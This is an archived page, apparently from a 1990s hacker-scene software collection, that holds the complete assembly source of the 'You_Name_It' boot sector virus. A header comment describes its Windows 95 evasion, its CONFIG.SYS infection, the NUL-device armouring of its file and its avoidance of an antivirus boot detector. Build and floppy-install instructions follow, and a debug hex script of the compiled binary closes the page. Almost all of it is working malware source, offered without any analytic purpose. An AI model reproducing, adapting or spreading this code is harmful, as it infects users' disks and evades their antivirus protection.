home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
CCTX0198.ZIP
/
QMUPDAT7.ZIP
/
UNAMEIT.ZIP
/
UNAMEIT.ASM
next >
Wrap
Assembly Source File
|
1997-02-05
|
16KB
|
381 lines
comment *
Designed by "Q" the Misanthrope
The "You_Name_It" virus needed to be made. Windows 95 has neglected the
floppy boot sector virus long enough. Windows 95 in it's 32 bit protected
mode has it's own floppy disk routines and doesn't use int 13 or int 40
anymore. When a floppy boot sector viruses infectes the hard disk of the
Windows 95 computer, it would flag a change in the MBR or DBR indicating
a possible virus attack (not good). The conclusion, don't hook int 13, hook
int 21. Problem is, when Windows 95 starts up, it starts in DOS mode then
changes to it's protected mode DOS so int 21 hooked in DOS mode isn't hooked
anymore. Many of the multipatrite virii will not infect once Windows 95
starts. If your boot sector virus can infect a program called in your
AUTOEXEC.BAT or you CONFIG.SYS then the virus would go resident. The
"You_Name_it" virus does this. It creates a randomly named file and adds
INSTALLHIGH=C:\AKYT.SQW (name is random) to the CONFIG.SYS file. Now when
Windows 95's int 21 is called to change the default drive to A: then the
infection occures. Also to armor the virus a NUL device by the same name as
the virus is created so any reads, writes or deletes of the virus will go
into NUL-Space. Also the boot sector infection will not attack the CONFIG.SYS
multiple times.
P.S. This virus will not be detected by Thunderbytes TBRESCUE Boot sector
detector or CMOS virus protection.
tasm unameit /m2
tlink unameit
exe2bin unameit.exe unameit.com
format a:/q/u
debug unameit.com
l 300 0 0 1
w 100 0 0 1
w 300 0 20 1
m 13e,2ff 100
rcx
1c2
w
q
unameit
*
.286
qseg segment byte public 'CODE'
assume cs:qseg,es:qseg,ss:nothing,ds:qseg
top: jmp short jmp_install ;boot sector data
db 90h
db 'MSDOS5.0'
dw 512
db 1
dw 1
db 2
dw 224
dw 2880
db 0F0h
dw 9
dw 18
dw 2
org 003eh
com_install proc near
jmp short go_mem_res
com_install endp
jmp_install proc near ;floppy boot up
push cs ;for the retf to 0000:7c00
id equ $+1
mov si,7c00h ;7c00 is the infection marker
lea bx,word ptr ds:[si] ;bx=7c00
push bx ;for the retf to 0000:7c00
cld
push cs
mov es,bx ;if monochrome copy code to
pop ds ;7c00:7c00
cmp word ptr ds:[0449h],07h ;check if monochrome
je monochrome
push 0b800h ;lets reside in video memory
pop es ;no need for that TOM
cmp word ptr es:[si+id-top],si
monochrome: push es ;check if already mem resident
mov di,si ;di=7c00
mov cx,offset previous_hook ;copy loop varable
push cx ;save it because we will copy
push si ;the code twice to b800:7c00
rep movsb ;and b800:7dfe
pop si
pop cx
call return_far ;goto b800 segment of code
rep movsb ;continue copy to b800:7dfe
mov si,1ah*04h ;only hook int 1a
je already_res ;if already resident don't
movsw ;hook again
movsw
mov word ptr ds:[si-02h],cs ;hook int 1a
mov word ptr ds:[si-04h],offset interrupt_1a+7e00h-02h
already_res: push ds ;read moved floppy boot sector
pop es
re_get_boot: mov ax,0201h
jmp_install endp
set_cx_dx proc near
mov bp,word ptr ds:[bx+11h] ;code to point to last sector
mov cx,word ptr ds:[bx+16h] ;of the root directory of any
shr bp,04h ;floppy disk
shl cx,01h
add cx,bp
inc cx
mov dh,01h
sub cx,word ptr ds:[bx+18h]
int 13h ;read or write boot sector
return_far: retf ;return to 7c00:0000 or
set_cx_dx endp ;resident_21 routine
config_line db "C:\CONFIG.SYS",00 ;file to infect
install_name db 'INSTALLHIGH=' ;what to add
file_name db 'C:\' ;random file name goes here
db 00h
dot equ $+3
crlf equ $+7
go_mem_res proc near ;CONFIG.SYS residency
mov ah,30h ;dos versions less than 4.0
int 21h ;had their NUL pointer at
cmp al,04h ;different locations so don't
jb below_dos4 ;make NUL device if less than
mov ah,52h ;dos 4.0
int 21h ;get list of lists
cld
lds si,dword ptr es:[bx+22h];point to second device
push cs ;in device chain and break in
pop es
mov di,0060h-0ah ;at CS:60 there are 8 nice
movsw ;spaces of 20h for device name
movsw ;padding
mov word ptr ds:[si-02h],cs ;break into device chain
mov word ptr ds:[si-04h],0060h-0ah
mov ax,8004h ;show nul char device
stosw ;save it
stosw ;strategy and interrupt
stosw ;pointer can be anything
mov ax,cs ;get filename from cs-1:0008
dec ax
mov ds,ax
mov si,0008h
movsw ;file name is only 4 letters
movsw ;before the .
below_dos4: push cs
pop ds
mov es,word ptr ds:[si-0ch+2ch]
mov ah,49h ;free up environment just cuz
int 21h
mov ax,3521h ;get int 21
int 21h ;save old int 21
mov word ptr ds:[previous_hook-com_install+0100h],bx
mov word ptr ds:[previous_hook-com_install+0102h],es
mov ax,2521h ;set int 21
mov dx,resident_21-com_install+0100h
int 21h
mov ah,31h ;go tsr
mov dx,((tail-com_install+010fh) SHR 4)
int 21h
go_mem_res endp
interrupt_21 proc near ;hooked in after int 1a sees
pushf ;that dos loaded during boot
pusha
push ds
push cs
pop ds
xor ah,4bh ;unload if a program starts
jz set_21_back
mov ax,3d42h ;open c:\config.sys
mov dx,offset config_line+7e00h-02h
int 18h ;really it is int 21
mov bx,5700h ;get date
xchg ax,bx
jc keep_trying ;unable to open c:\config.sys
int 18h
or cl,cl ;is c:\config.sys infected
jz close_it
pusha ;save file date
mov ah,5ah ;create random file
sub cx,cx
mov dx,offset file_name+7e00h-02h
int 18h
mov bh,3eh ;close it
xchg ax,bx ;then delete it because it has
int 18h ;no extension
mov ah,41h
int 18h ;create new file using random
mov ax,5b2eh ;file with . in 5th character
mov byte ptr ds:[dot+7e00h-02h],al
mov cl,05h ;file w/system and readonly
int 18h
mov dx,offset com_install+7c00h
mov bh,40h ;write virus code into file
xchg ax,bx
mov ch,02h
int 18h
mov ah,3eh ;close it
int 18h
popa ;date and handle c:\config.sys
inc ax ;set date
pusha ;save it for later
mov ax,4202h ;go to end of c:\config.sys
sub cx,cx
cwd
int 18h
mov ah,40h ;write INSTALLHIGH=C:\ line
mov word ptr ds:[crlf+7e00h-02h],0a0dh
mov cl,low(crlf-install_name+02h)
mov dx,offset install_name+7e00h-02h
int 18h ;be sure to cr lf terminate it
popa ;get file date
xor cl,cl ;blitz seconds and more
int 18h
close_it: mov ah,3eh ;close c:\config.sys
int 18h
set_21_back: lds dx,dword ptr ds:[previous_hook+7c00h]
mov ax,2521h ;unhook ourselves because
int 18h ;we have infection
keep_trying: jmp pop_ds_and_all
interrupt_21 endp
resident_21 proc near ;memory resident int 21
pushf ;called when loaded from
pusha ;config.sys
push ds
push es
cmp ah,0eh ;is it set drive
jne not_setcurrent
or dl,dl ;drive A:
jnz not_setcurrent
cwd ;set varables to read sector
mov bx,offset vbuffer-com_install+0100h
push cs
mov cx,0001h
pop es
push cs
mov ax,0201h ;try reading the boot sector
pop ds
int 13h
jc not_setcurrent ;if not don't infect
cmp byte ptr ds:[bx+id-top+01h],7ch
je not_setcurrent ;check if infected
mov ax,0301h ;move and write boot sector
pusha ;save for later
push cs ;for far retf
call set_cx_dx
cld
mov cx,previous_hook-com_install
mov si,0100h ;copy virus to boot sector
lea di,word ptr ds:[bx+com_install-top]
rep movsb
mov word ptr ds:[bx],0000h
org $-2
jmp $(jmp_install-top) ;place initial jmp at front
popa
int 13h ;write it
not_setcurrent: jmp short pop_it
resident_21 endp
org 001c3h
interrupt_1a proc near ;hooked at boot and waits for
pushf ;dos to load
pusha
mov ax,1200h ;dos loaded
push ds
push es
cwd
int 2fh
inc al
mov ds,dx ;if loaded then hook int 21
mov si,21h*04h ;sorry for all the complexity
mov di,offset previous_hook+7c00h
jnz pop_it ;and unhook int 1a
les bx,dword ptr cs:[previous_hook+7e00h-02h]
mov ds:[si-((21h-1ah)*04h)+2],es
mov ds:[si-((21h-1ah)*04h)],bx
les bx,dword ptr ds:[si]
mov ds:[si-((21h-18h)*04h)+2],es
push cs ;also save int 21 into int 18
cld
mov ds:[si-((21h-18h)*04h)],bx
pop es
movsw
movsw
mov word ptr ds:[si-04h],offset interrupt_21+7c00h
mov word ptr ds:[si-02h],cs ;set int 21
pop_it: pop es
pop_ds_and_all: pop ds
popa
popf
interrupt_1a endp
org 001fdh
far_jmp proc near
db 0eah ;jmp to old int 1a or boot
previous_hook: label double ;up int 21 or resident int 21
far_jmp endp
boot_signature dw 0aa55h ;guess what
org $+0002h
vbuffer label byte ;buffer to read boot sector
org $+0202h ;the end of the code
tail label byte
qseg ends
end
comment *
debug script
nunameit.com
e0100 EB 74 0E BE 00 7C 8D 1C 53 FC 0E 8E C3 1F 83 3E
e0110 49 04 07 74 08 68 00 B8 07 26 39 74 42 06 8B FE
e0120 B9 FE 01 51 56 F3 A4 5E 59 E8 2B 00 F3 A4 BE 68
e0130 00 74 0A A5 A5 8C 4C FE C7 44 FC C1 7F 1E 07 B8
e0140 01 02 8B 6F 11 8B 4F 16 C1 ED 04 D1 E1 03 CD 41
e0150 B6 01 2B 4F 18 CD 13 CB 43 3A 5C 43 4F 4E 46 49
e0160 47 2E 53 59 53 00 49 4E 53 54 41 4C 4C 48 49 47
e0170 48 3D 43 3A 5C 00 B4 30 CD 21 3C 04 72 28 B4 52
e0180 CD 21 FC 26 C5 77 22 0E 07 BF 56 00 A5 A5 8C 4C
e0190 FE C7 44 FC 56 00 B8 04 80 AB AB AB 8C C8 48 8E
e01A0 D8 BE 08 00 A5 A5 0E 1F 8E 44 20 B4 49 CD 21 B8
e01B0 21 35 CD 21 89 1E C0 02 8C 06 C2 02 B8 21 25 BA
e01C0 42 02 CD 21 B4 31 BA 4D 00 CD 21 9C 60 1E 0E 1F
e01D0 80 F4 4B 74 62 B8 42 3D BA 94 7E CD 18 BB 00 57
e01E0 93 72 5D CD 18 0A C9 74 4A 60 B4 5A 2B C9 BA AE
e01F0 7E CD 18 B7 3E 93 CD 18 B4 41 CD 18 B8 2E 5B A2
e0200 B5 7E B1 05 CD 18 BA 3E 7C B7 40 93 B5 02 CD 18
e0210 B4 3E CD 18 61 40 60 B8 02 42 2B C9 99 CD 18 B4
e0220 40 C7 06 B9 7E 0D 0A B1 19 BA A2 7E CD 18 61 32
e0230 C9 CD 18 B4 3E CD 18 C5 16 FE 7D B8 21 25 CD 18
e0240 EB 7A 9C 60 1E 06 80 FC 0E 75 37 0A D2 75 33 99
e0250 BB C4 02 0E B9 01 00 07 0E B8 01 02 1F CD 13 72
e0260 21 80 7F 43 7C 74 1B B8 01 03 60 0E E8 D3 FE FC
e0270 B9 C0 01 BE 00 01 8D 7F 3E F3 A4 C7 07 EB 3E 61
e0280 CD 13 EB 37 00 9C 60 B8 00 12 1E 06 99 CD 2F FE
e0290 C0 8E DA BE 84 00 BF FE 7D 75 20 2E C4 1E FC 7F
e02A0 8C 44 E6 89 5C E4 C4 1C 8C 44 DE 0E FC 89 5C DC
e02B0 07 A5 A5 C7 44 FC 09 7D 8C 4C FE 07 1F 61 9D EA
e02C0 55 AA
rcx
1c2
w
q
*
